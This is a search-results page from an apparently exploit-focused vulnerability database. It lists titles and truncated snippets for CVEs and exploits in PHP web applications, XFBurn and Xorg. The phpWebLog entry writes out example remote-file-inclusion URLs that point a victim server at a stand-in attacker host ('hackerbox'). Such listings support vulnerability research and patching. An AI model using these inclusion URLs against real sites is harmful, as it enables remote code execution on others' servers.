142 matches found
Linux XFBurn Stack-based Buffer Overflow Vulnerability
Exploit for linux platform in category dos / poc Exploit Title: Linux XFBurn Stack-based Buffer Overflow Type: CWE-121 Exploit Author: Hosein Askari FarazPajohan Vendor HomePage: http://goodies.xfce.org/projects/applications/xfburn Version : 0.5.4 Tested on: Ubuntu 17.04 Date: 24-03-2017 Category...
WordPress Chat-Room plugin v0.1.2 directory traversal/arbitrary file write Vulnerabilities
Exploit for php platform in category web applications Exploit Title: WordPress Chat-Room plugin v0.1.2 directory traversal/arbitrary file write Date: 2017-03-08 Exploit Author: malwrforensics Vendor Homepage: https://webdevstudios.com/ Software Link: https://wordpress.org/plugins/chat-room/...
DEBIAN-CVE-2016-9853
An issue was discovered in phpMyAdmin. By calling some scripts that are part of phpMyAdmin in an unexpected way, it is possible to trigger phpMyAdmin to display a PHP error message which contains the full path of the directory where phpMyAdmin is installed. During an execution timeout in the expo...
CVE-2016-9853
An issue was discovered in phpMyAdmin. By calling some scripts that are part of phpMyAdmin in an unexpected way, it is possible to trigger phpMyAdmin to display a PHP error message which contains the full path of the directory where phpMyAdmin is installed. During an execution timeout in the expo...
UBUNTU-CVE-2016-9853
An issue was discovered in phpMyAdmin. By calling some scripts that are part of phpMyAdmin in an unexpected way, it is possible to trigger phpMyAdmin to display a PHP error message which contains the full path of the directory where phpMyAdmin is installed. During an execution timeout in the expo...
Path traversal
An issue was discovered in phpMyAdmin. By calling some scripts that are part of phpMyAdmin in an unexpected way, it is possible to trigger phpMyAdmin to display a PHP error message which contains the full path of the directory where phpMyAdmin is installed. During an execution timeout in the expo...
CVE-2016-9853
An issue was discovered in phpMyAdmin. By calling some scripts that are part of phpMyAdmin in an unexpected way, it is possible to trigger phpMyAdmin to display a PHP error message which contains the full path of the directory where phpMyAdmin is installed. During an execution timeout in the expo...
CVE-2016-9853
An issue was discovered in phpMyAdmin. By calling some scripts that are part of phpMyAdmin in an unexpected way, it is possible to trigger phpMyAdmin to display a PHP error message which contains the full path of the directory where phpMyAdmin is installed. During an execution timeout in the expo...
PHP 'fopen_wrappers.c' Integer Overflow Vulnerability
PHP is a new language for writing CGI programs. An integer overflow vulnerability exists in PHP 'fopenwrappers.c'. An attacker could be allowed to exploit this vulnerability to execute arbitrary code in the context of a user's affected application, or a failed attack would result in a denial of...
VBULLETIN 5.2.0/5.2.1/5.2.2 MEDIA UPLOAD SSRF PRIVILEGE ESCALATION
Author: c1tas, p0wd3r know Chong Yu 404 security lab CVE: CVE-2016-6483 A vulnerability overview vBulletin accepts the url parameters, it is not prohibited to jump transduction induced SSRF vBulletin need this function to access external connections, but this limit is not strict cause can trigger...
PHP File Vault 0.9 Directory Traversal / File Read
PHP File Vault version 0.9 , remote directory traversal and read file vulnerabilty ================================================================================== Discovered by NA, NAattutanota.com ====================================== Description =========== A very small PHP website...
SugarCRM 6.5.18 fopen() Command Injection / XSS / SSRF
----------------------------------------------------------------------------- SugarCRM generateTitle; User input passed through the "typemodule" request parameter isn’t properly sanitized before being used to instantiate a new DashletRssFeedTitle object, and this could be exploited to carry out...
PHP Utility Belt - Remote Code Execution
Exploit Title : PHP utility belt Remote Code Execution vulnerability Author : WICS Date : 8/12/2015 Software Link : https://github.com/mboynes/php-utility-belt Overview: PHP utility belt is a set of tools for PHP developers. Install in a browser-accessible directory and have at it. ajax.php is...
CVE-2007-0448
The fopen function in PHP 5.2.0 does not properly handle invalid URI handlers, which allows context-dependent attackers to bypass safemode restrictions and read arbitrary files via a file path specified with an invalid URI, as demonstrated via the srpath URI...
up.time 7.5.0 Upload And Execute File Exploit
Exploit for php platform in category web applications up.time 7.5.0 Upload And Execute File Exploit Vendor: Idera Inc. Product web page: http://www.uptimesoftware.com Affected version: 7.5.0 build 16 and 7.4.0 build 13 Summary: The next-generation of IT monitoring software. Desc: up.time suffers...
webERP <= 4.08.1 - Local/Remote File Inclusion Vulnerability
No description provided by source. :::::::-. ... ::::::. :::. ;;, ';, ;; ;;;;;;;, ;;; ' . ' $$, $$$$ $$$ $$$ Y$c$$ 888,o8P'88 .d888 888 Y88 MMMMP YmmMMMM MMM YM Discovered by dun \ posdubatgmail.com 2012-06-27 webERP = 4.08.1 Local/Remote File Inclusion Vulnerability Script: Accounting & Best...
phpWebLog <= 0.5.3 Arbitrary File Inclusion
No description provided by source. Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/include/init.inc.php?GPATH=http://hackerbox/ http://victim/dir/backend/addons/links/index.php?PATH=http://hackerbox/ milw0rm.com 2005-03-07...
Sports PHool <= 1.0 - Remote File Include Exploit
No description provided by source. ?php / Sports PHool = 1.0 Remote File Include Exploit Found and c0ded by cr4wl3r @hackb0x d0rk: no d0rk f0r kiddi0ts Script: http://sourceforge.net/projects/sportsphool/files/ usage: target: http://target/sportsphool/includes/layout/plain.footer.php?mainnav= evi...
Webboard <= 2.90 beta - Remote File Disclosure Vulnerability
No description provided by source. Webboard = v.2.90 beta Remote File Disclosure Vulnerability ============================================================= Author: MrDoug Email: mrdoug13 at gmail dot com Greetz to all my friends ============================================================= There...
Xorg 1.4 to 1.11.2 File Permission Change PoC
No description provided by source. / xchmod.c -- Xorg file permission change vulnerability PoC Author: vladz http://vladz.devzero.fr Date: 2011/12/15 Software: www.x.org Version: Xorg 1.4 to 1.11.2 in all configurations. Xorg 1.3 and earlier if built with the USECHMOD preprocessor identifier Test...